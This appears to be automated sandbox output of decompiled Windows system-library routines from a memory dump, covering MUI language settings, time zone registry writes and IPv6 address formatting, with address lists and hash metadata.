                                                                                                                                                      				_v28 = 0;
                                                                                                                                                      				_v48 = 0;
                                                                                                                                                      				_v20 = 0;
                                                                                                                                                      				_v40 = 0;
                                                                                                                                                      				_v32 = 0;
                                                                                                                                                      				_v52 = 0;
                                                                                                                                                      				if(_t334 == 0) {
                                                                                                                                                      					_t329 = 0xc000000d;
                                                                                                                                                      					L49:
                                                                                                                                                      					_t334[0x11] = _v56;
                                                                                                                                                      					 *_t334 =  *_t334 | 0x00000800;
                                                                                                                                                      					_t334[0x12] = _v60;
                                                                                                                                                      					_t334[0x13] = _v28;
                                                                                                                                                      					_t334[0x17] = _v20;
                                                                                                                                                      					_t334[0x16] = _v48;
                                                                                                                                                      					_t334[0x18] = _v40;
                                                                                                                                                      					_t334[0x14] = _v32;
                                                                                                                                                      					_t334[0x15] = _v52;
                                                                                                                                                      					return _t329;
                                                                                                                                                      				}
                                                                                                                                                      				_v56 = 0;
                                                                                                                                                      				if(E00938460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                      					_v56 = 1;
                                                                                                                                                      					if(_v8 != 0) {
                                                                                                                                                      						_t207 = E0091E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                      					}
                                                                                                                                                      					_push(1);
                                                                                                                                                      					_v8 = _t318;
                                                                                                                                                      					E0093718A(_t207);
                                                                                                                                                      					_t335 = _t335 + 4;
                                                                                                                                                      				}
                                                                                                                                                      				_v60 = _v60 | 0xffffffff;
                                                                                                                                                      				if(E00938460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                      					_t333 =  *_v8;
                                                                                                                                                      					_v60 = _t333;
                                                                                                                                                      					_t314 = E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                      					_push(_t333);
                                                                                                                                                      					_v8 = _t318;
                                                                                                                                                      					E0093718A(_t314);
                                                                                                                                                      					_t335 = _t335 + 4;
                                                                                                                                                      				}
                                                                                                                                                      				_t216 = E00938460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                                                                                                                      				_t332 = ";";
                                                                                                                                                      				if(_t216 < 0) {
                                                                                                                                                      					L17:
                                                                                                                                                      					if(E00938460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                      						L30:
                                                                                                                                                      						if(E00938460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                      							L46:
                                                                                                                                                      							_t329 = 0;
                                                                                                                                                      							L47:
                                                                                                                                                      							if(_v8 != _t318) {
                                                                                                                                                      								E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                      							}
                                                                                                                                                      							if(_v28 != _t318) {
                                                                                                                                                      								if(_v20 != _t318) {
                                                                                                                                                      									E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                      									_v20 = _t318;
                                                                                                                                                      									_v40 = _t318;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      							goto L49;
                                                                                                                                                      						}
                                                                                                                                                      						_t231 = _v24;
                                                                                                                                                      						_t322 = _t231 + 4;
                                                                                                                                                      						_push(_t231);
                                                                                                                                                      						_v52 = _t322;
                                                                                                                                                      						E0093718A(_t231);
                                                                                                                                                      						if(_t322 == _t318) {
                                                                                                                                                      							_v32 = _t318;
                                                                                                                                                      						} else {
                                                                                                                                                      							_v32 = E0091E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                      						}
                                                                                                                                                      						if(_v32 == _t318) {
                                                                                                                                                      							_v52 = _t318;
                                                                                                                                                      							L58:
                                                                                                                                                      							_t329 = 0xc0000017;
                                                                                                                                                      							goto L47;
                                                                                                                                                      						} else {
                                                                                                                                                      							E00912340(_v32, _v8, _v24);
                                                                                                                                                      							_v16 = _v32;
                                                                                                                                                      							_a4 = _t318;
                                                                                                                                                      							_t235 = E0092E679(_v32, _t332);
                                                                                                                                                      							while(1) {
                                                                                                                                                      								_t319 = _t235;
                                                                                                                                                      								if(_t319 == 0) {
                                                                                                                                                      									break;
                                                                                                                                                      								}
                                                                                                                                                      								 *_t319 = 0;
                                                                                                                                                      								_t321 = _t319 + 2;
                                                                                                                                                      								E0091E2A8(_t322,  &_v68, _v16);
                                                                                                                                                      								if(E00935553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                      									_a4 = _a4 + 1;
                                                                                                                                                      								}
                                                                                                                                                      								_v16 = _t321;
                                                                                                                                                      								_t235 = E0092E679(_t321, _t332);
                                                                                                                                                      								_pop(_t322);
                                                                                                                                                      							}
                                                                                                                                                      							_t236 = _v16;
                                                                                                                                                      							if( *_v16 != _t319) {
                                                                                                                                                      								E0091E2A8(_t322,  &_v68, _t236);
                                                                                                                                                      								if(E00935553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                      									_a4 = _a4 + 1;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      							if(_a4 == 0) {
                                                                                                                                                      								E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                                                                                                                      								_v52 = _v52 & 0x00000000;
                                                                                                                                                      								_v32 = _v32 & 0x00000000;
                                                                                                                                                      							}
                                                                                                                                                      							if(_v8 != 0) {
                                                                                                                                                      								E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                      							}
                                                                                                                                                      							_v8 = _v8 & 0x00000000;
                                                                                                                                                      							_t318 = 0;
                                                                                                                                                      							goto L46;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					_t257 = _v24;
                                                                                                                                                      					_t322 = _t257 + 4;
                                                                                                                                                      					_push(_t257);
                                                                                                                                                      					_v40 = _t322;
                                                                                                                                                      					E0093718A(_t257);
                                                                                                                                                      					_t338 = _t335 + 4;
                                                                                                                                                      					if(_t322 == _t318) {
                                                                                                                                                      						_v20 = _t318;
                                                                                                                                                      					} else {
                                                                                                                                                      						_v20 = E0091E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                      					}
                                                                                                                                                      					if(_v20 == _t318) {
                                                                                                                                                      						_v40 = _t318;
                                                                                                                                                      						goto L58;
                                                                                                                                                      					} else {
                                                                                                                                                      						E00912340(_v20, _v8, _v24);
                                                                                                                                                      						_v16 = _v20;
                                                                                                                                                      						_a4 = _t318;
                                                                                                                                                      						_t261 = E0092E679(_v20, _t332);
                                                                                                                                                      						_t335 = _t338 + 0x14;
                                                                                                                                                      						while(1) {
                                                                                                                                                      							_v12 = _t261;
                                                                                                                                                      							if(_t261 == _t318) {
                                                                                                                                                      								break;
                                                                                                                                                      							}
                                                                                                                                                      							_v12 = _v12 + 2;
                                                                                                                                                      							 *_v12 = 0;
                                                                                                                                                      							E0091E2A8(_v12,  &_v68, _v16);
                                                                                                                                                      							if(E00935553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                      								_a4 = _a4 + 1;
                                                                                                                                                      							}
                                                                                                                                                      							_v16 = _v12;
                                                                                                                                                      							_t261 = E0092E679(_v12, _t332);
                                                                                                                                                      							_pop(_t322);
                                                                                                                                                      						}
                                                                                                                                                      						_t269 = _v16;
                                                                                                                                                      						if( *_v16 != _t318) {
                                                                                                                                                      							E0091E2A8(_t322,  &_v68, _t269);
                                                                                                                                                      							if(E00935553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                      								_a4 = _a4 + 1;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						if(_a4 == _t318) {
                                                                                                                                                      							E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                      							_v40 = _t318;
                                                                                                                                                      							_v20 = _t318;
                                                                                                                                                      						}
                                                                                                                                                      						if(_v8 != _t318) {
                                                                                                                                                      							E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                      						}
                                                                                                                                                      						_v8 = _t318;
                                                                                                                                                      						goto L30;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t284 = _v24;
                                                                                                                                                      				_t322 = _t284 + 4;
                                                                                                                                                      				_push(_t284);
                                                                                                                                                      				_v48 = _t322;
                                                                                                                                                      				E0093718A(_t284);
                                                                                                                                                      				_t339 = _t335 + 4;
                                                                                                                                                      				if(_t322 == _t318) {
                                                                                                                                                      					_v28 = _t318;
                                                                                                                                                      				} else {
                                                                                                                                                      					_v28 = E0091E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                      				}
                                                                                                                                                      				if(_v28 == _t318) {
                                                                                                                                                      					_v48 = _t318;
                                                                                                                                                      					goto L58;
                                                                                                                                                      				} else {
                                                                                                                                                      					E00912340(_v28, _v8, _v24);
                                                                                                                                                      					_v16 = _v28;
                                                                                                                                                      					_a4 = _t318;
                                                                                                                                                      					_t288 = E0092E679(_v28, _t332);
                                                                                                                                                      					_t335 = _t339 + 0x14;
                                                                                                                                                      					while(1) {
                                                                                                                                                      						_v12 = _t288;
                                                                                                                                                      						if(_t288 == _t318) {
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						_v12 = _v12 + 2;
                                                                                                                                                      						 *_v12 = 0;
                                                                                                                                                      						E0091E2A8(_v12,  &_v68, _v16);
                                                                                                                                                      						if(E00935553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                      							_a4 = _a4 + 1;
                                                                                                                                                      						}
                                                                                                                                                      						_v16 = _v12;
                                                                                                                                                      						_t288 = E0092E679(_v12, _t332);
                                                                                                                                                      						_pop(_t322);
                                                                                                                                                      					}
                                                                                                                                                      					_t296 = _v16;
                                                                                                                                                      					if( *_v16 != _t318) {
                                                                                                                                                      						E0091E2A8(_t322,  &_v68, _t296);
                                                                                                                                                      						if(E00935553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                      							_a4 = _a4 + 1;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					if(_a4 == _t318) {
                                                                                                                                                      						E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                                                                                                                      						_v48 = _t318;
                                                                                                                                                      						_v28 = _t318;
                                                                                                                                                      					}
                                                                                                                                                      					if(_v8 != _t318) {
                                                                                                                                                      						E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                      					}
                                                                                                                                                      					_v8 = _t318;
                                                                                                                                                      					goto L17;
                                                                                                                                                      				}
                                                                                                                                                      			}

                                                                                                                                                      0x00938b13
                                                                                                                                                      0x00938b19
                                                                                                                                                      0x00938b1f
                                                                                                                                                      0x00938b25
                                                                                                                                                      0x00938b2b
                                                                                                                                                      0x00938b31
                                                                                                                                                      0x00938b37
                                                                                                                                                      0x00938b3d
                                                                                                                                                      0x00938b46
                                                                                                                                                      0x00938b46
                                                                                                                                                      0x009387c6
                                                                                                                                                      0x009387d0
                                                                                                                                                      0x00981ae0
                                                                                                                                                      0x00981ae6
                                                                                                                                                      0x00981af8
                                                                                                                                                      0x00981af8
                                                                                                                                                      0x00981afd
                                                                                                                                                      0x00981afe
                                                                                                                                                      0x00981b01
                                                                                                                                                      0x00981b06
                                                                                                                                                      0x00981b06
                                                                                                                                                      0x009387d6
                                                                                                                                                      0x009387f2
                                                                                                                                                      0x009387f7
                                                                                                                                                      0x00938807
                                                                                                                                                      0x0093880a
                                                                                                                                                      0x0093880f
                                                                                                                                                      0x00938810
                                                                                                                                                      0x00938813
                                                                                                                                                      0x00938818
                                                                                                                                                      0x00938818
                                                                                                                                                      0x0093882c
                                                                                                                                                      0x00938831
                                                                                                                                                      0x00938838
                                                                                                                                                      0x00938908
                                                                                                                                                      0x00938920
                                                                                                                                                      0x009389f0
                                                                                                                                                      0x00938a08
                                                                                                                                                      0x00938af6
                                                                                                                                                      0x00938af6
                                                                                                                                                      0x00938af8
                                                                                                                                                      0x00938afb
                                                                                                                                                      0x00981beb
                                                                                                                                                      0x00981beb
                                                                                                                                                      0x00938b04
                                                                                                                                                      0x00981bf8
                                                                                                                                                      0x00981c0e
                                                                                                                                                      0x00981c13
                                                                                                                                                      0x00981c16
                                                                                                                                                      0x00981c16
                                                                                                                                                      0x00981bf8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00938b04
                                                                                                                                                      0x00938a0e
                                                                                                                                                      0x00938a11
                                                                                                                                                      0x00938a14
                                                                                                                                                      0x00938a15
                                                                                                                                                      0x00938a18
                                                                                                                                                      0x00938a22
                                                                                                                                                      0x00938b59
                                                                                                                                                      0x00938a28
                                                                                                                                                      0x00938a3c
                                                                                                                                                      0x00938a3c
                                                                                                                                                      0x00938a42
                                                                                                                                                      0x00981bb0
                                                                                                                                                      0x00981b11
                                                                                                                                                      0x00981b11
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00938a48
                                                                                                                                                      0x00938a51
                                                                                                                                                      0x00938a5b
                                                                                                                                                      0x00938a5e
                                                                                                                                                      0x00938a61
                                                                                                                                                      0x00938a69
                                                                                                                                                      0x00938a69
                                                                                                                                                      0x00938a6d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00938a74
                                                                                                                                                      0x00938a7c
                                                                                                                                                      0x00938a7d
                                                                                                                                                      0x00938a91
                                                                                                                                                      0x00938a93
                                                                                                                                                      0x00938a93
                                                                                                                                                      0x00938a98
                                                                                                                                                      0x00938a9b
                                                                                                                                                      0x00938aa1
                                                                                                                                                      0x00938aa1
                                                                                                                                                      0x00938aa4
                                                                                                                                                      0x00938aaa
                                                                                                                                                      0x00938ab1
                                                                                                                                                      0x00938ac5
                                                                                                                                                      0x00938ac7
                                                                                                                                                      0x00938ac7
                                                                                                                                                      0x00938ac5
                                                                                                                                                      0x00938ace
                                                                                                                                                      0x00981bc9
                                                                                                                                                      0x00981bce
                                                                                                                                                      0x00981bd2
                                                                                                                                                      0x00981bd2
                                                                                                                                                      0x00938ad8
                                                                                                                                                      0x00938aeb
                                                                                                                                                      0x00938aeb
                                                                                                                                                      0x00938af0
                                                                                                                                                      0x00938af4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00938af4
                                                                                                                                                      0x00938a42
                                                                                                                                                      0x00938926
                                                                                                                                                      0x00938929
                                                                                                                                                      0x0093892c
                                                                                                                                                      0x0093892d
                                                                                                                                                      0x00938930
                                                                                                                                                      0x00938935
                                                                                                                                                      0x0093893a
                                                                                                                                                      0x00938b51
                                                                                                                                                      0x00938940
                                                                                                                                                      0x00938954
                                                                                                                                                      0x00938954
                                                                                                                                                      0x0093895a
                                                                                                                                                      0x00981b63
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00938960
                                                                                                                                                      0x00938969
                                                                                                                                                      0x00938973
                                                                                                                                                      0x00938976
                                                                                                                                                      0x00938979
                                                                                                                                                      0x0093897e
                                                                                                                                                      0x00938981
                                                                                                                                                      0x00938981
                                                                                                                                                      0x00938986
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00981b6e
                                                                                                                                                      0x00981b74
                                                                                                                                                      0x00981b7b
                                                                                                                                                      0x00981b8f
                                                                                                                                                      0x00981b91
                                                                                                                                                      0x00981b91
                                                                                                                                                      0x00981b99
                                                                                                                                                      0x00981b9c
                                                                                                                                                      0x00981ba2
                                                                                                                                                      0x00981ba2
                                                                                                                                                      0x0093898c
                                                                                                                                                      0x00938992
                                                                                                                                                      0x00938999
                                                                                                                                                      0x009389ad
                                                                                                                                                      0x00981ba8
                                                                                                                                                      0x00981ba8
                                                                                                                                                      0x009389ad
                                                                                                                                                      0x009389b6
                                                                                                                                                      0x009389c8
                                                                                                                                                      0x009389cd
                                                                                                                                                      0x009389d0
                                                                                                                                                      0x009389d0
                                                                                                                                                      0x009389d6
                                                                                                                                                      0x009389e8
                                                                                                                                                      0x009389e8
                                                                                                                                                      0x009389ed
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009389ed
                                                                                                                                                      0x0093895a
                                                                                                                                                      0x0093883e
                                                                                                                                                      0x00938841
                                                                                                                                                      0x00938844
                                                                                                                                                      0x00938845
                                                                                                                                                      0x00938848
                                                                                                                                                      0x0093884d
                                                                                                                                                      0x00938852
                                                                                                                                                      0x00938b49
                                                                                                                                                      0x00938858
                                                                                                                                                      0x0093886c
                                                                                                                                                      0x0093886c

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • Kernel-MUI-Language-Disallowed, xrefs: 00938914
                                                                                                                                                      • Kernel-MUI-Language-Allowed, xrefs: 00938827
                                                                                                                                                      • WindowsExcludedProcs, xrefs: 009387C1
                                                                                                                                                      • Kernel-MUI-Language-SKU, xrefs: 009389FC
                                                                                                                                                      • Kernel-MUI-Number-Allowed, xrefs: 009387E6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcspbrk
                                                                                                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                      • API String ID: 402402107-258546922
                                                                                                                                                      • Opcode ID: ce9806898184e62619ce85bde7b7d4e482c459d6ada83373159015600ac85896
                                                                                                                                                      • Instruction ID: 7933886f3f67479ed92c2c05ac5fc6f875a652e98cfaea1cb7981e3f0119657d
                                                                                                                                                      • Opcode Fuzzy Hash: ce9806898184e62619ce85bde7b7d4e482c459d6ada83373159015600ac85896
                                                                                                                                                      • Instruction Fuzzy Hash: 4EF1C4B2D00249EFCF11EF95C981AEEB7B8FB48300F15446AF505A7611EB35AA85DF60
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                      			E009A822C(void* __ecx, void* __edx, signed int _a4, signed int _a8) {
                                                                                                                                                      				char _v8;
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				signed int _t41;
                                                                                                                                                      				void* _t42;
                                                                                                                                                      				signed int* _t50;
                                                                                                                                                      				void* _t71;
                                                                                                                                                      				void* _t73;
                                                                                                                                                      				void* _t78;
                                                                                                                                                      				signed int _t81;
                                                                                                                                                      				void* _t84;
                                                                                                                                                      
                                                                                                                                                      				_push(__ecx);
                                                                                                                                                      				_t81 = _a4;
                                                                                                                                                      				_t84 = 0x20;
                                                                                                                                                      				_t71 = E009C5A34(_t81 + 4, _t84);
                                                                                                                                                      				if(_t71 < _t84) {
                                                                                                                                                      					_t41 = E009C5A34(_t81 + 0x58, _t84);
                                                                                                                                                      					_pop(_t78);
                                                                                                                                                      					_a4 = _t41;
                                                                                                                                                      					__eflags = _t41 - _t84;
                                                                                                                                                      					if(_t41 >= _t84) {
                                                                                                                                                      						goto L1;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t42 = E00967DCD(1,  &_v8);
                                                                                                                                                      						__eflags = _t42;
                                                                                                                                                      						if(__eflags >= 0) {
                                                                                                                                                      							__eflags = E009A810D(_t71, _t78, __eflags, 0x40000000, _v8, L"Bias", 4, _t81, 4);
                                                                                                                                                      							if(__eflags < 0) {
                                                                                                                                                      								L14:
                                                                                                                                                      								_a4 = 0;
                                                                                                                                                      								_t73 = E009A810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1,  &_a4, 2);
                                                                                                                                                      								__eflags = _t73;
                                                                                                                                                      								if(__eflags >= 0) {
                                                                                                                                                      									_a8 =  *(_t81 + 0x1ac) & 0x000000ff;
                                                                                                                                                      									_t50 =  &_a8;
                                                                                                                                                      									goto L16;
                                                                                                                                                      								}
                                                                                                                                                      							} else {
                                                                                                                                                      								_t8 = _t71 + 2; // 0x2
                                                                                                                                                      								__eflags = E009A810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardName", 1, _t81 + 4, _t71 + _t8);
                                                                                                                                                      								if(__eflags < 0) {
                                                                                                                                                      									goto L14;
                                                                                                                                                      								} else {
                                                                                                                                                      									_t71 = 4;
                                                                                                                                                      									__eflags = E009A810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardBias", _t71, _t81 + 0x54, _t71);
                                                                                                                                                      									if(__eflags < 0) {
                                                                                                                                                      										goto L14;
                                                                                                                                                      									} else {
                                                                                                                                                      										__eflags = E009A810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardStart", 3, _t81 + 0x44, 0x10);
                                                                                                                                                      										if(__eflags < 0) {
                                                                                                                                                      											goto L14;
                                                                                                                                                      										} else {
                                                                                                                                                      											__eflags = E009A810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightName", 1, _t81 + 0x58, _a4 + _a4 + 2);
                                                                                                                                                      											if(__eflags < 0) {
                                                                                                                                                      												goto L14;
                                                                                                                                                      											} else {
                                                                                                                                                      												__eflags = E009A810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightBias", _t71, _t81 + 0xa8, _t71);
                                                                                                                                                      												if(__eflags < 0) {
                                                                                                                                                      													goto L14;
                                                                                                                                                      												} else {
                                                                                                                                                      													__eflags = E009A810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightStart", 3, _t81 + 0x98, 0x10);
                                                                                                                                                      													if(__eflags < 0) {
                                                                                                                                                      														goto L14;
                                                                                                                                                      													} else {
                                                                                                                                                      														__eflags = _a8 - 0x1b0;
                                                                                                                                                      														if(__eflags < 0) {
                                                                                                                                                      															goto L14;
                                                                                                                                                      														} else {
                                                                                                                                                      															_t73 = E009A810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1, _t81 + 0xac, 0x100);
                                                                                                                                                      															__eflags = _t73;
                                                                                                                                                      															if(__eflags >= 0) {
                                                                                                                                                      																_a4 =  *(_t81 + 0x1ac) & 0x000000ff;
                                                                                                                                                      																_t50 =  &_a4;
                                                                                                                                                      																L16:
                                                                                                                                                      																_t73 = E009A810D(_t73, _t78, __eflags, 0x40000000, _v8, L"DynamicDaylightTimeDisabled", 4, _t50, 4);
                                                                                                                                                      															}
                                                                                                                                                      														}
                                                                                                                                                      													}
                                                                                                                                                      												}
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      							E0090F9F0(_v8);
                                                                                                                                                      							_t42 = _t73;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					L1:
                                                                                                                                                      					_t42 = 0xc000000d;
                                                                                                                                                      				}
                                                                                                                                                      				return _t42;
                                                                                                                                                      			}













                                                                                                                                                      0x009a8317
                                                                                                                                                      0x009a8319
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009a831b
                                                                                                                                                      0x009a8332
                                                                                                                                                      0x009a8334
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009a8336
                                                                                                                                                      0x009a834f
                                                                                                                                                      0x009a8351
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009a8353
                                                                                                                                                      0x009a8353
                                                                                                                                                      0x009a835a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009a835c
                                                                                                                                                      0x009a8378
                                                                                                                                                      0x009a837a
                                                                                                                                                      0x009a837c
                                                                                                                                                      0x009a8385
                                                                                                                                                      0x009a8388
                                                                                                                                                      0x009a83bc
                                                                                                                                                      0x009a83cf
                                                                                                                                                      0x009a83cf
                                                                                                                                                      0x009a837c
                                                                                                                                                      0x009a835a
                                                                                                                                                      0x009a8351
                                                                                                                                                      0x009a8334
                                                                                                                                                      0x009a8319
                                                                                                                                                      0x009a82f5
                                                                                                                                                      0x009a82d7
                                                                                                                                                      0x009a82b8
                                                                                                                                                      0x009a83d4
                                                                                                                                                      0x009a83d9
                                                                                                                                                      0x009a83d9
                                                                                                                                                      0x009a8277
                                                                                                                                                      0x009a824d
                                                                                                                                                      0x009a824d
                                                                                                                                                      0x009a824d
                                                                                                                                                      0x009a824d
                                                                                                                                                      0x009a83df

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcsnlen
                                                                                                                                                      • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                                                                                                                      • API String ID: 3628947076-1387797911
                                                                                                                                                      • Opcode ID: 24d389e4c1792a0ae01570e4ca24ed2b90ebc0c4bf532265b9049ac7f7794881
                                                                                                                                                      • Instruction ID: ed9561b2ac03a114ff75624e302b01ddcdf5327b9f9fd6a094a533537bf44eea
                                                                                                                                                      • Opcode Fuzzy Hash: 24d389e4c1792a0ae01570e4ca24ed2b90ebc0c4bf532265b9049ac7f7794881
                                                                                                                                                      • Instruction Fuzzy Hash: 5741A575248209BEEB019AD1CD42FDFBBACEF46B48F100512BA04D6191DFB0DB519BE4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 38%
                                                                                                                                                      			E009513CB(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                      				char _v8;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				intOrPtr* _v16;
                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                      				char _v24;
                                                                                                                                                      				intOrPtr _t71;
                                                                                                                                                      				signed int _t78;
                                                                                                                                                      				signed int _t86;
                                                                                                                                                      				char _t90;
                                                                                                                                                      				signed int _t91;
                                                                                                                                                      				signed int _t96;
                                                                                                                                                      				intOrPtr _t108;
                                                                                                                                                      				signed int _t114;
                                                                                                                                                      				void* _t115;
                                                                                                                                                      				intOrPtr _t128;
                                                                                                                                                      				intOrPtr* _t129;
                                                                                                                                                      				void* _t130;
                                                                                                                                                      
                                                                                                                                                      				_t129 = _a4;
                                                                                                                                                      				_t128 = _a8;
                                                                                                                                                      				_t116 = 0;
                                                                                                                                                      				_t71 = _t128 + 0x5c;
                                                                                                                                                      				_v8 = 8;
                                                                                                                                                      				_v20 = _t71;
                                                                                                                                                      				if( *_t129 == 0) {
                                                                                                                                                      					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                                                                                                                      						goto L5;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                                                                                                                      						if(_t96 != 0) {
                                                                                                                                                      							L38:
                                                                                                                                                      							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                                                                                                                      								goto L5;
                                                                                                                                                      							} else {
                                                                                                                                                      								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                      								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                      								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                      								_t86 = E00947707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                      								L36:
                                                                                                                                                      								return _t128 + _t86 * 2;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
